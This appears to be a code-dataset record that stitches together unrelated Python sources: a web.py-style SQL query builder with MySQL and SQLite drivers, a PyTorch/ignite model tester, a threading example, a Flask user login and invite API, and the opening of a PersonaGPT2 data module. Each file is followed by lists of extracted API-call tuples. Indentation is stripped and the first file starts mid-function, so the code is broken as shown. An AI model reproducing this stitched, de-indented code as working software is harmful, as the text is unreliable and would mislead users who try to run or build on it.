self.ctx.commit()
return out
def select(self, tables, args=None, what='*', where=None, order=None, group=None,
limit=None, offset=None, _test=False):
"""
Selects `what` from `tables` with clauses `where`, `order`,
`group`, `limit`, and `offset`. Uses args to interpolate.
Otherwise, each clause can be a SQLQuery.
>>> db = DB(None, {})
>>> db.select('foo', _test=True)
<sql: 'SELECT * FROM foo'>
>>> db.select(['foo', 'bar'], where="foo.bar_id = bar.id", limit=5, _test=True)
<sql: 'SELECT * FROM foo, bar WHERE foo.bar_id = bar.id LIMIT 5'>
"""
if args is None: args = {}
sql_clauses = self.sql_clauses(what, tables, where, group, order, limit, offset)
clauses = [self.gen_clause(sql, val, args) for sql, val in sql_clauses if val is not None]
qout = SQLQuery.join(clauses)
if _test: return qout
return self.query(qout, processed=True)
def where(self, table, what='*', order=None, group=None, limit=None,
offset=None, _test=False, **kwargs):
"""
Selects from `table` where keys are equal to values in `kwargs`.
>>> db = DB(None, {})
>>> db.where('foo', bar_id=3, _test=True)
<sql: 'SELECT * FROM foo WHERE bar_id = 3'>
>>> db.where('foo', source=2, crust='dewey', _test=True)
<sql: "SELECT * FROM foo WHERE source = 2 AND crust = 'dewey'">
>>> db.where('foo', _test=True)
<sql: 'SELECT * FROM foo'>
"""
where_clauses = []
for k, v in kwargs.iteritems():
where_clauses.append(k + ' = ' + sqlquote(v))
if where_clauses:
where = SQLQuery.join(where_clauses, " AND ")
else:
where = None
return self.select(table, what=what, order=order,
group=group, limit=limit, offset=offset, _test=_test,
where=where)
def sql_clauses(self, what, tables, where, group, order, limit, offset):
return (
('SELECT', what),
('FROM', sqllist(tables)),
('WHERE', where),
('GROUP BY', group),
('ORDER BY', order),
('LIMIT', limit),
('OFFSET', offset))
def gen_clause(self, sql, val, args):
if isinstance(val, (int)):
if sql == 'WHERE':
nout = 'id = ' + sqlquote(val)
else:
nout = SQLQuery(val)
#@@@
elif isinstance(val, (list, tuple)) and len(val) == 2:
nout = SQLQuery(val[0], val[1]) # backwards-compatibility
elif isinstance(val, SQLQuery):
nout = val
else:
nout = reparam(val, args)
def xjoin(a, b):
if a and b: return a + ' ' + b
else: return a or b
return xjoin(sql, nout)
def insert(self, tablename, seqname=None, _test=False, **values):
"""
Inserts `values` into `tablename`. Returns current sequence ID.
Set `seqname` to the ID if it's not the default, or to `False`
if there isn't one.
>>> db = DB(None, {})
>>> q = db.insert('foo', name='bob', age=2, created=SQLLiteral('NOW()'), _test=True)
>>> q
<sql: "INSERT INTO foo (age, name, created) VALUES (2, 'bob', NOW())">
>>> q.query()
'INSERT INTO foo (age, name, created) VALUES (%s, %s, NOW())'
>>> q.values()
[2, 'bob']
"""
def q(x): return "(" + x + ")"
if values:
_keys = SQLQuery.join(values.keys(), ', ')
_values = SQLQuery.join([sqlparam(v) for v in values.values()], ', ')
sql_query = "INSERT INTO %s " % tablename + q(_keys) + ' VALUES ' + q(_values)
else:
sql_query = SQLQuery(self._get_insert_default_values_query(tablename))
if _test: return sql_query
db_cursor = self._db_cursor()
if seqname is not False:
sql_query = self._process_insert_query(sql_query, tablename, seqname)
if isinstance(sql_query, tuple):
# for some databases, a separate query has to be made to find
# the id of the inserted row.
q1, q2 = sql_query
self._db_execute(db_cursor, q1)
self._db_execute(db_cursor, q2)
else:
self._db_execute(db_cursor, sql_query)
try:
out = db_cursor.fetchone()[0]
except Exception:
out = None
if not self.ctx.transactions:
self.ctx.commit()
return out
def _get_insert_default_values_query(self, table):
return "INSERT INTO %s DEFAULT VALUES" % table
def multiple_insert(self, tablename, values, seqname=None, _test=False):
"""
        Inserts multiple rows into `tablename`. The `values` must be a list of dictionaries,
one for each row to be inserted, each with the same set of keys.
Returns the list of ids of the inserted rows.
Set `seqname` to the ID if it's not the default, or to `False`
if there isn't one.
>>> db = DB(None, {})
>>> db.supports_multiple_insert = True
>>> values = [{"name": "foo", "email": "<EMAIL>"}, {"name": "bar", "email": "<EMAIL>"}]
>>> db.multiple_insert('person', values=values, _test=True)
<sql: "INSERT INTO person (name, email) VALUES ('foo', '<EMAIL>'), ('bar', '<EMAIL>')">
"""
if not values:
return []
if not self.supports_multiple_insert:
out = [self.insert(tablename, seqname=seqname, _test=_test, **v) for v in values]
if seqname is False:
return None
else:
return out
keys = values[0].keys()
# @@ make sure all keys are valid
# make sure all rows have same keys.
for v in values:
if v.keys() != keys:
raise ValueError('Bad data')
sql_query = SQLQuery('INSERT INTO %s (%s) VALUES ' % (tablename, ', '.join(keys)))
for i, row in enumerate(values):
if i != 0:
sql_query.append(", ")
SQLQuery.join([SQLParam(row[k]) for k in keys], sep=", ", target=sql_query, prefix="(", suffix=")")
if _test: return sql_query
db_cursor = self._db_cursor()
if seqname is not False:
sql_query = self._process_insert_query(sql_query, tablename, seqname)
if isinstance(sql_query, tuple):
# for some databases, a separate query has to be made to find
# the id of the inserted row.
q1, q2 = sql_query
self._db_execute(db_cursor, q1)
self._db_execute(db_cursor, q2)
else:
self._db_execute(db_cursor, sql_query)
try:
out = db_cursor.fetchone()[0]
out = range(out - len(values) + 1, out + 1)
except Exception:
out = None
if not self.ctx.transactions:
self.ctx.commit()
return out
def update(self, tables, where, args=None, _test=False, **values):
"""
Update `tables` with clause `where` (interpolated using `args`)
and setting `values`.
>>> db = DB(None, {})
>>> name = 'Joseph'
>>> q = db.update('foo', where='name = $name', name='bob', age=2,
... created=SQLLiteral('NOW()'), args=locals(), _test=True)
>>> q
<sql: "UPDATE foo SET age = 2, name = 'bob', created = NOW() WHERE name = 'Joseph'">
>>> q.query()
'UPDATE foo SET age = %s, name = %s, created = NOW() WHERE name = %s'
>>> q.values()
[2, 'bob', 'Joseph']
"""
if args is None: args = {}
where = self._where(where, args)
query = (
"UPDATE " + sqllist(tables) +
" SET " + sqlwhere(values, ', ') +
" WHERE " + where)
if _test: return query
db_cursor = self._db_cursor()
self._db_execute(db_cursor, query)
if not self.ctx.transactions:
self.ctx.commit()
return db_cursor.rowcount
def delete(self, table, where, using=None, args=None, _test=False):
"""
Deletes from `table` with clauses `where` and `using`.
>>> db = DB(None, {})
>>> name = 'Joe'
>>> db.delete('foo', where='name = $name', args=locals(), _test=True)
<sql: "DELETE FROM foo WHERE name = 'Joe'">
"""
if args is None: args = {}
where = self._where(where, args)
q = 'DELETE FROM ' + table
if using: q += ' USING ' + sqllist(using)
if where: q += ' WHERE ' + where
if _test: return q
db_cursor = self._db_cursor()
self._db_execute(db_cursor, q)
if not self.ctx.transactions:
self.ctx.commit()
return db_cursor.rowcount
def _process_insert_query(self, query, tablename, seqname):
return query
def transaction(self):
"""Start a transaction."""
return Transaction(self.ctx)
class MySQLDB(DB):
def __init__(self, **keywords):
import MySQLdb as db
if 'pw' in keywords:
keywords['passwd'] = keywords['pw']
del keywords['pw']
if 'charset' not in keywords:
keywords['charset'] = 'utf8'
elif keywords['charset'] is None:
del keywords['charset']
self.paramstyle = db.paramstyle = 'pyformat' # it's both, like psycopg
self.dbname = "mysql"
DB.__init__(self, db, keywords)
self.supports_multiple_insert = True
def _process_insert_query(self, query, tablename, seqname):
return query, SQLQuery('SELECT last_insert_id();')
def _get_insert_default_values_query(self, table):
return "INSERT INTO %s () VALUES()" % table
def import_driver(drivers, preferred=None):
"""Import the first available driver or preferred driver.
"""
if preferred:
drivers = [preferred]
for d in drivers:
try:
return __import__(d, None, None, ['x'])
except ImportError:
pass
raise ImportError("Unable to import " + " or ".join(drivers))
class SqliteDB(DB):
def __init__(self, **keywords):
db = import_driver(["sqlite3", "pysqlite2.dbapi2", "sqlite"], preferred=keywords.pop('driver', None))
if db.__name__ in ["sqlite3", "pysqlite2.dbapi2"]:
db.paramstyle = 'qmark'
            # sqlite driver doesn't create datetime objects for timestamp columns unless `detect_types` option is passed.
            # It seems to be supported in the sqlite3 and pysqlite2 drivers, not sure about sqlite.
keywords.setdefault('detect_types', db.PARSE_DECLTYPES)
self.paramstyle = db.paramstyle
keywords['database'] = keywords.pop('db')
        keywords['pooling'] = False  # sqlite doesn't allow connections to be shared between threads
self.dbname = "sqlite"
DB.__init__(self, db, keywords)
def _process_insert_query(self, query, tablename, seqname):
return query, SQLQuery('SELECT last_insert_rowid();')
def query(self, *a, **kw):
out = DB.query(self, *a, **kw)
if isinstance(out, IterBetter):
del out.__len__
return out
# class PostgresDB(DB):
# """Postgres driver."""
# def __init__(self, **keywords):
# if 'pw' in keywords:
# keywords['password'] = keywords.pop('pw')
#
# db_module = import_driver(["psycopg2", "psycopg", "pgdb"], preferred=keywords.pop('driver', None))
# if db_module.__name__ == "psycopg2":
# import psycopg2.extensions
# psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)
#
# # if db is not provided postgres driver will take it from PGDATABASE environment variable
# if 'db' in keywords:
# keywords['database'] = keywords.pop('db')
#
# self.dbname = "postgres"
# self.paramstyle = db_module.paramstyle
# DB.__init__(self, db_module, keywords)
# self.supports_multiple_insert = True
# self._sequences = None
#
# def _process_insert_query(self, query, tablename, seqname):
# if seqname is None:
# # when seqname is not provided guess the seqname and make sure it exists
# seqname = tablename + "_id_seq"
# if seqname not in self._get_all_sequences():
# seqname = None
#
# if seqname:
# query += "; SELECT currval('%s')" % seqname
#
# return query
#
# def _get_all_sequences(self):
# """Query postgres to find names of all sequences used in this database."""
# if self._sequences is None:
# q = "SELECT c.relname FROM pg_class c WHERE c.relkind = 'S'"
# self._sequences = set([c.relname for c in self.query(q)])
# return self._sequences
#
# def _connect(self, keywords):
# conn = DB._connect(self, keywords)
# try:
# conn.set_client_encoding('UTF8')
# except AttributeError:
# # fallback for pgdb driver
# conn.cursor().execute("set client_encoding to 'UTF-8'")
# return conn
#
# def _connect_with_pooling(self, keywords):
# conn = DB._connect_with_pooling(self, keywords)
# conn._con._con.set_client_encoding('UTF8')
# return conn
# class OracleDB(DB):
# def __init__(self, **keywords):
# import cx_Oracle as db
# if 'pw' in keywords:
# keywords['password'] = keywords.pop('pw')
#
# # @@ TODO: use db.makedsn if host, port is specified
# keywords['dsn'] = keywords.pop('db')
# self.dbname = 'oracle'
# db.paramstyle = 'numeric'
# self.paramstyle = db.paramstyle
#
# # oracle doesn't support pooling
# keywords.pop('pooling', None)
# DB.__init__(self, db, keywords)
#
# def _process_insert_query(self, query, tablename, seqname):
# if seqname is None:
# # It is not possible to get seq name from table name in Oracle
# return query
# else:
# return query + "; SELECT %s.currval FROM dual" % seqname
# class MSSQLDB(DB):
# def __init__(self, **keywords):
# import pymssql as db
# if 'pw' in keywords:
# keywords['password'] = keywords.pop('pw')
# keywords['database'] = keywords.pop('db')
# self.dbname = "mssql"
# DB.__init__(self, db, keywords)
#
# def _process_query(self, sql_query):
# """Takes the SQLQuery object and returns query string and parameters.
# """
# # MSSQLDB expects params to be a tuple.
# # Overwriting the default implementation to convert params to tuple.
# paramstyle = getattr(self, 'paramstyle', 'pyformat')
# query = sql_query.query(paramstyle)
# params = sql_query.values()
# return query, tuple(params)
#
# def sql_clauses(self, what, tables, where, group, order, limit, offset):
# return (
# ('SELECT', what),
# ('TOP', limit),
# ('FROM', sqllist(tables)),
# ('WHERE', where),
# ('GROUP BY', group),
# ('ORDER BY', order),
# ('OFFSET', offset))
#
# def _test(self):
# """Test LIMIT.
#
# Fake presence of pymssql module for running tests.
# >>> import sys
# >>> sys.modules['pymssql'] = sys.modules['sys']
#
# MSSQL has TOP clause instead of LIMIT clause.
# >>> db = MSSQLDB(db='test', user='joe', pw='secret')
# >>> db.select('foo', limit=4, _test=True)
# <sql: 'SELECT * TOP 4 FROM foo'>
# """
# pass
_databases = {}
def sqlclient(dburl=None, **params):
"""Creates appropriate database using params.
Pooling will be enabled if DBUtils module is available.
Pooling can be disabled by passing pooling=False in params.
"""
dbn = params.pop('dbn')
if dbn in _databases:
return _databases[dbn](**params)
else:
raise UnknownDB(dbn)
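# Illustrative call (not part of the original source); `dbn` selects the registered
# backend and the remaining keywords are passed to its constructor:
#     db = sqlclient(dbn='mysql', db='test', user='joe', pw='secret', pooling=False)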
def register_database(name, clazz):
"""
Register a database.
>>> class LegacyDB(DB):
... def __init__(self, **params):
... pass
...
>>> register_database('legacy', LegacyDB)
    >>> db = sqlclient(dbn='legacy', db='test', user='joe', passwd='<PASSWORD>')
"""
_databases[name] = clazz
register_database('mysql', MySQLDB)
register_database('sqlite', SqliteDB)
# register_database('postgres', PostgresDB)
# register_database('oracle', OracleDB)
# register_database('mssql', MSSQLDB)
def _interpolate(format1):
"""
Takes a format1 string and returns a list of 2-tuples of the form
(boolean, string) where boolean says whether string should be evaled
or not.
from <http://lfw.org/python/Itpl.py> (public domain, Ka-Ping Yee)
"""
from tokenize import Token
def matchorfail(text, pos):
tokenprog = re.compile(Token)
match = tokenprog.match(text, pos)
if match is None:
raise _ItplError(text, pos)
return match, match.end()
namechars = "abcdefghijklmnopqrstuvwxyz" \
"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_";
chunks = []
pos = 0
while 1:
dollar = format1.find("$", pos)
if dollar < 0:
break
nextchar = format1[dollar + 1]
if nextchar == "{":
chunks.append((0, format1[pos:dollar]))
pos, level = dollar + 2, 1
while level:
match, pos = matchorfail(format1, pos)
tstart, tend = match.regs[3]
token = format1[tstart:tend]
if token == "{":
level = level + 1
elif token == "}":
level = level - 1
chunks.append((1, format1[dollar + 2:pos - 1]))
elif nextchar in namechars:
chunks.append((0, format1[pos:dollar]))
match, pos = matchorfail(format1, dollar + 1)
while pos < len(format1):
if format1[pos] == "." and \
pos + 1 < len(format1) and format1[pos + 1] in namechars:
match, pos = matchorfail(format1, pos + 1)
elif format1[pos] in "([":
pos, level = pos + 1, 1
while level:
match, pos = matchorfail(format1, pos)
tstart, tend = match.regs[3]
token = format1[tstart:tend]
if token[0] in "([":
level = level + 1
elif token[0] in ")]":
level = level - 1
else:
break
chunks.append((1, format1[dollar + 1:pos]))
else:
chunks.append((0, format1[pos:dollar + 1]))
pos = dollar + 1 + (nextchar == "$")
if pos < len(format1):
chunks.append((0, format1[pos:]))
return chunks
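# Illustrative expected output (not part of the original source):
#     _interpolate("WHERE name = $name")
#     -> [(0, 'WHERE name = '), (1, 'name')]
# reparam evaluates the "live" (flag 1) chunks and keeps the literal (flag 0) chunks verbatim.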
if __name__ == "__main__":
import doctest
doctest.testmod()
| [
"ssguan.ignitor.base.struct.ThreadedDict",
"re.compile",
"ssguan.ignitor.base.struct.Storage",
"DBUtils.PooledDB.PooledDB",
"doctest.testmod",
"time.time",
"DBUtils.PooledDB.__version__.split"
] | [((1113, 1122), 'ssguan.ignitor.base.struct.Storage', 'Storage', ([], {}), '()\n', (1120, 1122), False, 'from ssguan.ignitor.base.struct import ThreadedDict, Storage\n'), ((41310, 41327), 'doctest.testmod', 'doctest.testmod', ([], {}), '()\n', (41325, 41327), False, 'import doctest\n'), ((14751, 14765), 'ssguan.ignitor.base.struct.ThreadedDict', 'ThreadedDict', ([], {}), '()\n', (14763, 14765), False, 'from ssguan.ignitor.base.struct import ThreadedDict, Storage\n'), ((39121, 39138), 're.compile', 're.compile', (['Token'], {}), '(Token)\n', (39131, 39138), False, 'import re\n'), ((17956, 17967), 'time.time', 'time.time', ([], {}), '()\n', (17965, 17967), False, 'import time\n'), ((18091, 18102), 'time.time', 'time.time', ([], {}), '()\n', (18100, 18102), False, 'import time\n'), ((16929, 16960), 'DBUtils.PooledDB.__version__.split', 'PooledDB.__version__.split', (['"""."""'], {}), "('.')\n", (16955, 16960), False, 'from DBUtils import PooledDB\n'), ((17007, 17058), 'DBUtils.PooledDB.PooledDB', 'PooledDB.PooledDB', ([], {'dbapi': 'self.db_module'}), '(dbapi=self.db_module, **keywords)\n', (17024, 17058), False, 'from DBUtils import PooledDB\n'), ((17102, 17155), 'DBUtils.PooledDB.PooledDB', 'PooledDB.PooledDB', ([], {'creator': 'self.db_module'}), '(creator=self.db_module, **keywords)\n', (17119, 17155), False, 'from DBUtils import PooledDB\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Copyright (c) 2019, Linear Labs Technologies
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
import torch
import tqdm
import math
import torch.nn as nn
from torch.utils.data import DataLoader
from torch.autograd import Variable
from torch import optim
import torch.nn.functional as F
import torchvision.models as models
import yajl as json
from tensorboardX import SummaryWriter
import random
from PIL import Image
from torch.nn.utils.rnn import pack_padded_sequence
from ..Common.utils import *
from ..Common.Compiler import Compile,cfg2nets
from ..DataSet.TestSet import TestSet
from BLOX.Modules.ReplayMemory import ReplayMemory
from collections import namedtuple
from itertools import count
from ignite.engine import Events, create_supervised_trainer, create_supervised_evaluator
Transition = namedtuple('Transition',
('state', 'action', 'next_state', 'reward'))
device = 'cuda' if torch.cuda.is_available() else 'cpu'
from BLOX.Common.Strings import TITLE as TEXT
from BLOX.Core.Recordable import METRICS,ADDITIONAL_METRICS,Vizzy
class Tester:
def __init__(self,args):
try: self.config = json.load(open(args.config,'r'))
except:
if isinstance(args,dict): self.config = args
elif isinstance(args,str): self.config = json.load(open(args,'r'))
else:raise ValueError('Incorrect data type passed to Trainer class')
if self.config['Verbose']:print(TEXT+('\n'*8))
def run(self):
config = self.config
torch.cuda.empty_cache()
model = cfg2nets(config)
# data = DataLoader(TestSet(config['DataSet']), batch_size=config['BatchSize'] if 'BatchSize' in config else 1,shuffle=True )
data = TestSet(config['DataSet'])
writer = SummaryWriter(config['TensorboardX']['Dir'] if 'Dir' in config['TensorboardX'] else 'runs')
tlosses = np.zeros(config['Epochs'])
dlosses = np.zeros(config['Epochs'])
evaluator = create_supervised_evaluator(model,
device=device)
for m in config['TensorboardX']['Log']:
if m not in METRICS or m == 'Loss':continue
mtrc = METRICS[m]()
mtrc.attach(evaluator,m)
pbar = tqdm.tqdm(
initial=0, leave=False, total=len(data),
)
add_metrics = {}
@evaluator.on(Events.ITERATION_COMPLETED)
def log_training_loss(engine):
i = engine.state.iteration
if (i%(config['TensorboardX']['LogEvery']))==0 and config['TensorboardX']['LogEvery'] > 0 and writer:
for m in engine.state.metrics.keys():
if m in METRICS:writer.add_scalar(m, engine.state.metrics[m], engine.state.iteration)
try:
for m in config['TensorboardX']['Log']:
if m in ADDITIONAL_METRICS:
if m not in add_metrics:
add_metrics[m] = {
'y_h':[],
'y':[]
}
add_metrics[m]['y'].append( engine.state.output[1].view(-1).numpy() )
add_metrics[m]['y_h'].append( engine.state.output[0].view(-1).data.numpy() )
except:pass
pbar.update(config['TensorboardX']['LogEvery'])
try:
evaluator.run(data, max_epochs=1)
except:pass
pbar.close()
try:
for m in config['TensorboardX']['Log']:
if m in ADDITIONAL_METRICS:
getattr(Vizzy,m)(Vizzy,ADDITIONAL_METRICS[m]( add_metrics[m]['y_h'],add_metrics[m]['y'] ))
except Exception as e:pass
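# Illustrative usage (not part of the original source): the constructor accepts a
# config dict, a path to a JSON config file, or an argparse-style object whose
# `config` attribute points to one, e.g.
#     Tester('path/to/config.json').run()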
| [
"ignite.engine.create_supervised_evaluator",
"collections.namedtuple",
"tensorboardX.SummaryWriter",
"torch.cuda.is_available",
"torch.cuda.empty_cache"
] | [((1420, 1489), 'collections.namedtuple', 'namedtuple', (['"""Transition"""', "('state', 'action', 'next_state', 'reward')"], {}), "('Transition', ('state', 'action', 'next_state', 'reward'))\n", (1430, 1489), False, 'from collections import namedtuple\n'), ((1534, 1559), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1557, 1559), False, 'import torch\n'), ((2136, 2160), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ([], {}), '()\n', (2158, 2160), False, 'import torch\n'), ((2389, 2485), 'tensorboardX.SummaryWriter', 'SummaryWriter', (["(config['TensorboardX']['Dir'] if 'Dir' in config['TensorboardX'] else 'runs')"], {}), "(config['TensorboardX']['Dir'] if 'Dir' in config[\n 'TensorboardX'] else 'runs')\n", (2402, 2485), False, 'from tensorboardX import SummaryWriter\n'), ((2592, 2641), 'ignite.engine.create_supervised_evaluator', 'create_supervised_evaluator', (['model'], {'device': 'device'}), '(model, device=device)\n', (2619, 2641), False, 'from ignite.engine import Events, create_supervised_trainer, create_supervised_evaluator\n')] |
#! python
from commonthread import *
import time
lg = ThreadLogger()
lg.debug('hello!')
def worker1(th, x, y, **kwargs):
lg.debug('start')
lg.debug('th.name={}'.format(th.name))
lg.debug('x={}'.format(x))
lg.debug('y={}'.format(y))
lg.debug('kwargs={}'.format(kwargs))
time.sleep(5)
lg.debug('end')
t1 = WorkerThread(worker1, 'XXX', 'YYY', kw1='KeyWord-1')
t1.start()
t1.join()
| [
"time.sleep"
] | [((308, 321), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (318, 321), False, 'import time\n')] |
from uuid import uuid4
from datetime import datetime, timedelta
from flask import request, make_response, jsonify, Blueprint
from flask_restful import Resource, Api
from marshmallow.exceptions import ValidationError as DataError
from flask_jwt_extended import create_access_token, get_jwt_identity, jwt_required, current_user
from pluggy import HookimplMarker
from sqlalchemy import func
from app.core.helpers import handleInternalError
from app.extentions import db
from .models import UserModel
from .schemas import UserSchema, UserInviteSchema, AcceptInviteSchema, UserFullProfileSchema
from .validators import validate_email
from .exceptions import ValidationError, AuthenticationError
impl = HookimplMarker('app')
user_schema = UserSchema()
user_full_profile = UserFullProfileSchema()
users_schema = UserSchema(many=True)
user_invite_schema = UserInviteSchema()
accept_invite_schema = AcceptInviteSchema()
class User(Resource):
@jwt_required
def get(self, user_id=None):
try:
if user_id:
user = UserModel.get_user_by_ids([user_id])
if (len(user) > 0):
return user_schema.dump(user[0]), 200
else:
return {"error": "Cannot find the user"}, 422
else:
return user_full_profile.dump(current_user), 200
except Exception as e:
return handleInternalError(e)
def post(self):
print(request.form)
return {'hello': 'world'}
class UserInvite(Resource):
@jwt_required
def post(self):
try:
if current_user.account_id is None:
return {"error": "Cannot find an associated account"}, 422
user_data = request.get_json()
user = user_invite_schema.load(user_data)
validate_email(user.email)
user.account_id = current_user.account_id
user.set_password_token = str(uuid4())
user.set_password_token_expiry = datetime.now() + timedelta(2)
user.save()
return user_invite_schema.dump(user), 200
except DataError as data_error:
return {"error": data_error.normalized_messages()}, 422
except ValidationError as data_error:
return {"error": data_error.error_message}, 422
except Exception as e:
return handleInternalError(e)
def put(self):
try:
request_data = request.get_json()
accept_invite_data = accept_invite_schema.load(request_data)
user = self.fetch_user_from_token(accept_invite_data['token'])
user.set_password_token = None
user.set_password_token_expiry = None
user.password = accept_invite_data['password']
user.activated_at = datetime.now()
user.save()
return user_schema.dump(user), 200
except ValidationError as data_error:
return {"error": data_error.error_message}, 422
except DataError as data_error:
return {"error": data_error.normalized_messages()}, 422
except Exception as e:
return handleInternalError(e)
def fetch_user_from_token(self, token):
user = UserModel.get_user_by_token(token)
cur_date_time = datetime.now()
if user is None or user.set_password_token_expiry < cur_date_time:
raise ValidationError("Token is invalid or expired")
return user
class UserLogin(Resource):
def post(self):
try:
credentials = request.get_json()
user = UserModel.query.filter(func.lower(
UserModel.email) == credentials['email']).first()
if user is None:
raise AuthenticationError(
"No account is assciated with the given email.")
if not user.check_password(credentials['password']):
raise AuthenticationError(
"Invalid email, password combination")
access_token = create_access_token(user)
return {'token': access_token}, 200
except AuthenticationError as auth_error:
return {'error': auth_error.error_message}, 401
class UserRegistration(Resource):
def post(self):
try:
user_data = request.get_json()
user = user_schema.load(user_data)
validate_email(user.email)
user.save()
return user_schema.dump(user), 200
except DataError as data_error:
return {'error': data_error.normalized_messages()}, 422
except ValidationError as data_error:
return {'error': data_error.error_message}, 422
except Exception as e:
return handleInternalError(e)
@impl
def app_load_blueprints(app):
userBp = Blueprint("user", __name__, url_prefix="/user")
userApi = Api(app=userBp)
userApi.add_resource(UserRegistration, "/register")
userApi.add_resource(UserLogin, "/login")
userApi.add_resource(User, "/", "/<user_id>")
userApi.add_resource(UserInvite, "/invite")
app.register_blueprint(userBp)
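# Routes registered above (for reference, derived from the add_resource calls):
#   /user/register -> UserRegistration, /user/login -> UserLogin,
#   /user/ and /user/<user_id> -> User, /user/invite -> UserInvite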
| [
"flask_restful.Api",
"pluggy.HookimplMarker",
"flask_jwt_extended.create_access_token",
"uuid.uuid4",
"app.core.helpers.handleInternalError",
"datetime.datetime.now",
"flask.request.get_json",
"datetime.timedelta",
"flask.Blueprint",
"sqlalchemy.func.lower"
] | [((698, 719), 'pluggy.HookimplMarker', 'HookimplMarker', (['"""app"""'], {}), "('app')\n", (712, 719), False, 'from pluggy import HookimplMarker\n'), ((4822, 4869), 'flask.Blueprint', 'Blueprint', (['"""user"""', '__name__'], {'url_prefix': '"""/user"""'}), "('user', __name__, url_prefix='/user')\n", (4831, 4869), False, 'from flask import request, make_response, jsonify, Blueprint\n'), ((4884, 4899), 'flask_restful.Api', 'Api', ([], {'app': 'userBp'}), '(app=userBp)\n', (4887, 4899), False, 'from flask_restful import Resource, Api\n'), ((3294, 3308), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (3306, 3308), False, 'from datetime import datetime, timedelta\n'), ((1734, 1752), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (1750, 1752), False, 'from flask import request, make_response, jsonify, Blueprint\n'), ((2451, 2469), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (2467, 2469), False, 'from flask import request, make_response, jsonify, Blueprint\n'), ((2802, 2816), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (2814, 2816), False, 'from datetime import datetime, timedelta\n'), ((3557, 3575), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (3573, 3575), False, 'from flask import request, make_response, jsonify, Blueprint\n'), ((4031, 4056), 'flask_jwt_extended.create_access_token', 'create_access_token', (['user'], {}), '(user)\n', (4050, 4056), False, 'from flask_jwt_extended import create_access_token, get_jwt_identity, jwt_required, current_user\n'), ((4308, 4326), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (4324, 4326), False, 'from flask import request, make_response, jsonify, Blueprint\n'), ((1399, 1421), 'app.core.helpers.handleInternalError', 'handleInternalError', (['e'], {}), '(e)\n', (1418, 1421), False, 'from app.core.helpers import handleInternalError\n'), ((1942, 1949), 'uuid.uuid4', 'uuid4', ([], {}), '()\n', (1947, 1949), False, 'from uuid import uuid4\n'), ((1996, 2010), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (2008, 2010), False, 'from datetime import datetime, timedelta\n'), ((2013, 2025), 'datetime.timedelta', 'timedelta', (['(2)'], {}), '(2)\n', (2022, 2025), False, 'from datetime import datetime, timedelta\n'), ((2368, 2390), 'app.core.helpers.handleInternalError', 'handleInternalError', (['e'], {}), '(e)\n', (2387, 2390), False, 'from app.core.helpers import handleInternalError\n'), ((3152, 3174), 'app.core.helpers.handleInternalError', 'handleInternalError', (['e'], {}), '(e)\n', (3171, 3174), False, 'from app.core.helpers import handleInternalError\n'), ((4748, 4770), 'app.core.helpers.handleInternalError', 'handleInternalError', (['e'], {}), '(e)\n', (4767, 4770), False, 'from app.core.helpers import handleInternalError\n'), ((3618, 3645), 'sqlalchemy.func.lower', 'func.lower', (['UserModel.email'], {}), '(UserModel.email)\n', (3628, 3645), False, 'from sqlalchemy import func\n')] |
# -*- coding: utf-8 -*-
r"""
DataModule
==========
The DataModule encapsulates all the steps needed to process data:
- Download / tokenize
- Save to disk.
- Apply transforms (tokenize, pad, batch creation, etc…).
- Load inside Dataset.
- Wrap inside a DataLoader.
The most important function to understand inside the DataModule is `build_input`, which
is responsible for building the inputs that will be used to train the PersonaGPT2 Model.
This function receives a tokenized `persona`, `history` and `reply`, concatenates everything
and builds the language model targets. It also keeps track of the position of the token used
to represent the entire sequence (the last one).
Example:
>>> tokenizer = GPT2Tokenizer.from_pretrained("gpt2")
>>> DataModule.build_input(
tokenizer=tokenizer,
persona=[[72, 588], [1820, 318]],
history=[[5303, 1804], [316, 20023]],
reply=[276, 764],
lm_labels=False
)
{'input_ids': [50258, 72, 588, 1820, 318, 50260, 5303, 1804, 50261, 316, 20023, 50260,
276, 764, 50258], 'token_type_ids': [50260, 50260, 50260, 50260, 50260, 50261, 50261,
50261, 50260, 50260, 50260, 50261, 50261, 50261, 50261], 'mc_token_ids': 14, 'lm_labels':
[-100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100]}
>>> DataModule.build_input(
tokenizer=tokenizer,
persona=[[72, 588], [1820, 318]],
history=[[5303, 1804], [316, 20023]],
reply=[276, 764],
lm_labels=True
)
{'input_ids': [50258, 72, 588, 1820, 318, 50260, 5303, 1804, 50261, 316, 20023, 50260,
276, 764, 50258], 'token_type_ids': [50260, 50260, 50260, 50260, 50260, 50261, 50261,
50261, 50260, 50260, 50260, 50261, 50261, 50261, 50261], 'mc_token_ids': 14, 'lm_labels':
[-100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, 276, 764, 50258]}
"""
import hashlib
import json
import multiprocessing
import os
from argparse import Namespace
from collections import defaultdict
from itertools import chain
from typing import Dict, List
import click
import torch
from torch.utils.data import DataLoader, TensorDataset
import pytorch_lightning as pl
from model.tokenizer import Tokenizer
from torchnlp.download import download_file_maybe_extract
PERSONACHAT_URL = "https://s3.amazonaws.com/datasets.huggingface.co/personachat/personachat_self_original.json"
PADDED_INPUTS = ["input_ids", "lm_labels", "token_type_ids"]
MODEL_INPUTS = ["input_ids", "mc_token_ids", "lm_labels", "mc_labels", "token_type_ids"]
class DataModule(pl.LightningDataModule):
"""PyTorch Lightning DataModule.
:param hparams: Namespace with data specific arguments.
